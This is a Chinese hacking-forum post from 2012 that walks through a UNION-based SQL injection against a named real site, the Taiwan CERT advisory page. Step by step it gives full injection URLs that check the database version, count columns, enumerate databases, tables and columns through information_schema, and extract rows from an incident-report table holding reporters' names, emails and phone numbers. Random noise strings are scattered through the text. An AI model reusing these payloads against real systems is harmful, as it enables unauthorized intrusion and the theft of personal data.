找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2017|回复: 0
打印 上一主题 下一主题

.高级暴库方法讲解

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:57:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
, Z- Q7 a4 q1 g) g7 [; r! h9 S2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
9 D+ l  ~+ C& z8 S/ P6 @http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--5 Y. L" n% r1 d
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
) G/ |+ L- O% J$ t1 q数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。) |0 A9 V) ]8 W' I1 w9 I8 y
4.判断有没有写权限( A: P$ M& U- O" n) u0 C% K
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限9 _' j- N& \) Y! `. r
没办法,手动猜表啦: k) ], s) C5 _) m, H& j* z
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
" F# h9 z4 J# ~, b' o但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
, v* b* M; t: O) c4 Nhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
) q7 `) w& i& {成功查出所有数据库,国外的黑客就是不一般。数据库如下:
" f. g" ?- h/ a% o! |" s+ pinformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
( s8 A4 U! M; {8 v9 {! g# d% o/ t6.爆表,爆的是twcert库8 K0 q$ _/ c; `8 ^& q
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--( C$ @# c0 b  U8 a- i
爆出如下表
2 n$ u+ }& w) ~' F: Vdownloadfile,irsys,newsdata,secrpt,secrpt_big5
/ a2 o+ r( i$ N% j- _+ F9 Z1 W/ R7.爆列名,这次爆的是irsys表# O0 W; W+ G/ q1 ^$ N
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
. y; J0 T7 x4 s/ f爆出如下列
# B" N9 ]: r; I8 l. c+ tir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
" R2 f0 J- }- g5 U, p8 R# J8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。) G: q' E: l  t1 r. L
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--4 O" T5 a( O  O1 r8 k2 ~- D# X7 i
返回是3,说明每个列里有3个地段- ]' J$ K  f1 h2 E" E
9.爆字段内容+ J+ k: Z+ ~, ~+ y. m
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
" t6 d7 |7 l6 ^* q$ O3 T/ [爆出name列的第一个字段的内容, Q+ k6 |3 _6 Y9 e
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
8 H* [7 L) L1 l% m8 D8 Z1 k爆出name列的第二个字段的内容
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表